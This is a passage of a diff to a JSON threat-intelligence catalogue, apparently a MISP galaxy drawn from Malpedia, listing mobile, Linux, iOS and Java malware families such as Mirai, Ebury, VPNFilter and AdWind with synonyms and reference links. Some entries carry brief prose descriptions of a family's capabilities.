"e1600d04-d2f7-4862-8bbc-0f038ea683ea", + "value": "TeleRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tempting_cedar", + "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware" + ] + }, + "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff", + "value": "TemptingCedar Spyware", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Catelites Android Bot", + "MarsElite Android Bot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz", + "http://blog.group-ib.com/cron" + ] + }, + "uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3", + "value": "TinyZ", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan", + "https://blog.lookout.com/titan-mobile-threat", + "https://www.alienvault.com/blogs/labs-research/delivery-keyboy" + ] + }, + "uuid": "7d418da3-d9d2-4005-8cc7-7677d1b11327", + "value": "Titan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada", + "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/", + "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html", + "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", + "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/", + "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/" + ] + }, + "uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8", + "value": "Triada", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001", + "https://twitter.com/illegalFawn/status/826775250583035904" + ] + }, + "uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6", + "value": "Unidentified APK 001", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002" + ] + }, + "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544", + "value": "Unidentified APK 002", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat", + "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/", + "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/" + ] + }, + "uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9", + "value": "Viper RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex", + "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/", + "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/" + ] + }, + "uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46", + "value": "WireX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot", + "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/", + "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/" + ] + }, + "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", + "value": "Xbot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat", + "https://blog.lookout.com/xrat-mobile-threat" + ] + }, + "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32", + "value": "XRat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark", + "https://securelist.com/whos-who-in-the-zoo/85394", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf" + ] + }, + "uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3", + "value": "ZooPark", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Qysly" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg", + "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1", + "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2", + "https://securelist.com/ztorg-from-rooting-to-sms/78775/" + ] + }, + "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202", + "value": "Ztorg", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoor_irc16", + "https://news.drweb.com/show/?c=5&i=10193&lng=en" + ] + }, + "uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8", + "value": "Irc16", + "description": "" + }, + { + "meta": { + "synonyms": [ + "gayfgt", + "Gafgyt", + "qbot", + "torlus", + "lizkebab" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", + "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", + "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", + "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf" + ] + }, + "uuid": "81917a93-6a70-4334-afe2-56904c1fafe9", + "value": "Bashlite", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CDorked.A" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked", + "https://www.symantec.com/security-center/writeup/2013-050214-5501-99", + "https://blogs.cisco.com/security/linuxcdorked-faqs", + "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/", + "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/", + "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html" + ] + }, + "uuid": "bb9eaaec-97c9-4014-94dd-129cecf31ff0", + "value": "CDorked", + "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro", + "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", + "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a" + ] + }, + "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b", + "value": "Chapro", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer", + "https://github.com/pooler/cpuminer" + ] + }, + "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", + "value": "Cpuminer", + "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", + "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", + "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", + "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", + "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/" + ] + }, + "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5", + "value": "Ebury", + "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus", + "https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/" + ] + }, + "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", + "value": "Erebus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ext4", + "https://www.recordedfuture.com/chinese-cyberespionage-operations/" + ] + }, + "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60", + "value": "ext4", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime", + "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf", + "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", + "https://x86.re/blog/hajime-a-follow-up/", + "http://blog.netlab.360.com/hajime-status-report-en/", + "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things", + "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461", + "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/", + "https://github.com/Psychotropos/hajime_hashes" + ] + }, + "uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489", + "value": "Hajime", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hakai", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" + ] + }, + "uuid": "0839c28a-ea11-44d4-93d1-24b246ef6743", + "value": "Hakai", + "description": "" + }, + { + "meta": { + "synonyms": [ + "HNS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek", + "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/", + "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/", + "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/", + "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/", + "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/", + "https://blog.netlab.360.com/hns-botnet-recent-activities-en/" + ] + }, + "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b", + "value": "Hide and Seek", + "description": "" + }, + { + "meta": { + "synonyms": [ + "IoTroop", + "Reaper" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper", + "https://research.checkpoint.com/new-iot-botnet-storm-coming/", + "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/", + "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm", + "https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/" + ] + }, + "uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2", + "value": "IoT Reaper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.jenx", + "https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/" + ] + }, + "uuid": "6a4365fc-8448-4270-ba93-0341788d004b", + "value": "JenX", + "description": "" + }, + { + "meta": { + "synonyms": [ + "STD" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten", + "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf" + ] + }, + "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12", + "value": "Kaiten", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady", + "https://news.drweb.com/news/?i=10140&lng=en" + ] + }, + "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", + "value": "Lady", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey", + "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger" + ] + }, + "uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea", + "value": "MiKey", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai", + "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", + "http://osint.bambenekconsulting.com/feeds/", + "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", + "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", + "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", + "https://isc.sans.edu/diary/22786", + "https://github.com/jgamblin/Mirai-Source-Code", + "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" + ] + }, + "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", + "value": "Mirai", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mokes", + "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" + ] + }, + "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", + "value": "Mokes", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose", + "http://www.welivesecurity.com/2015/05/26/moose-router-worm/", + "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/", + "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/" + ] + }, + "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0", + "value": "Moose", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack", + "https://news.drweb.com/?i=5760&c=23&lng=en" + ] + }, + "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50", + "value": "MrBlack", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari", + "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/", + "https://twitter.com/ankit_anubhav/status/1019647993547550720", + "https://twitter.com/360Netlab/status/1019759516789821441", + "https://twitter.com/hrbrmstr/status/1019922651203227653", + "https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863", + "https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html", + "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/" + ] + }, + "uuid": "ec67f206-6464-48cf-a012-3cdfc1278488", + "value": "Owari", + "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla", + "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf", + "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", + "https://twitter.com/juanandres_gs/status/944741575837528064" + ] + }, + "uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840", + "value": "Penquin Turla", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai", + "http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/" + ] + }, + "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", + "value": "Persirai", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.r2r2", + "https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/" + ] + }, + "uuid": "759f8590-a049-4c14-be8a-e6605e2cd43d", + "value": "r2r2", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos", + "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" + ] + }, + "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5", + "value": "Rakos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex", + "https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/", + "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/" + ] + }, + "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b", + "value": "Rex", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori", + "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/", + "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori", + "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/", + "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", + "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/", + "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/" + ] + }, + "uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0", + "value": "Satori", + "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361)." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shellbind", + "http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry" + ] + }, + "uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7", + "value": "ShellBind", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga", + "https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/" + ] + }, + "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5", + "value": "Shishiga", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte", + "http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/" + ] + }, + "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0", + "value": "Spamtorte", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor", + "http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html" + ] + }, + "uuid": "275d65b9-0894-4c9b-a255-83daddb2589c", + "value": "SSHDoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko", + "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" + ] + }, + "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", + "value": "Stantinko", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.torii", + "https://blog.avast.com/new-torii-botnet-threat-research" + ] + }, + "uuid": "a874575e-0ad7-464d-abb6-8f4b7964aa92", + "value": "Torii", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.trump_bot", + "http://paper.seebug.org/345/" + ] + }, + "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883", + "value": "Trump Bot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Amnesia", + "Radiation" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", + "https://www.8ackprotect.com/blog/big_brother_is_attacking_you", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", + "http://get.cyberx-labs.com/radiation-report" + ] + }, + "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac", + "value": "Tsunami", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat" + ] + }, + "uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0", + "value": "Turla RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Espeon" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon", + "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/", + "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html" + ] + }, + "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460", + "value": "Umbreon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter", + "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", + "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html", + "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities", + "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", + "https://blog.talosintelligence.com/2018/05/VPNFilter.html", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en", + "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware" + ] + }, + "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500", + "value": "elf.vpnfilter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess" + ] + }, + "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de", + "value": "elf.wellmess", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet", + "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", + "https://news.drweb.com/show/?i=2679&lng=en&c=14" + ] + }, + "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", + "value": "Wirenet", + "description": "" + }, + { + "meta": { + "synonyms": [ + "splm", + "chopstick", + "fysbis" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf", + "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/" + ] + }, + "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "value": "X-Agent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc", + "https://twitter.com/michalmalik/status/846368624147353601" + ] + }, + "uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2", + "value": "Xaynnalc", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", + "https://en.wikipedia.org/wiki/Xor_DDoS", + "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf", + "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html" + ] + }, + "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", + "value": "XOR DDoS", + "description": "Linux DDoS C&C Malware" + }, + { + "meta": { + "synonyms": [ + "darlloz" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zollard", + "https://blogs.cisco.com/security/the-internet-of-everything-including-malware" + ] + }, + "uuid": "9218630d-0425-4b18-802c-447a9322990d", + "value": "Zollard", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.dualtoy", + "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + ] + }, + "uuid": "8269e779-db23-4c94-aafb-36ee94879417", + "value": "DualToy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.guiinject", + "https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/" + ] + }, + "uuid": "d9215579-eee0-4e50-9157-dba7c3214769", + "value": "GuiInject", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + ] + }, + "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", + "value": "WireLurker", + "description": "The iOS malware that is installed over USB by osx.wirelurker" + }, + { + "meta": { + "synonyms": [ + "AlienSpy", + "JSocket", + "Frutas", + "UNRECOM", + "JBifrost", + "Sockrat" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", + "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", + "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", + "http://malware-traffic-analysis.net/2017/07/04/index.html", + "https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/", + "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", + "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html" + ] + }, + "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", + "value": "AdWind", + "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. Malspam URL to downlaod the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware" + }, + { + "meta": { + "synonyms": [ + "Trupto" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat", + "https://objective-see.com/blog/blog_0x28.html", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + ] + }, + "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", + "value": "CrossRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Jacksbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", + "https://github.com/java-rat", + "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered", + "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/" + ] + }, + "uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376", + "value": "jRAT", + "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy", + "https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/" + ] + }, + "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f", + "value": "jSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat", + "https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/", + 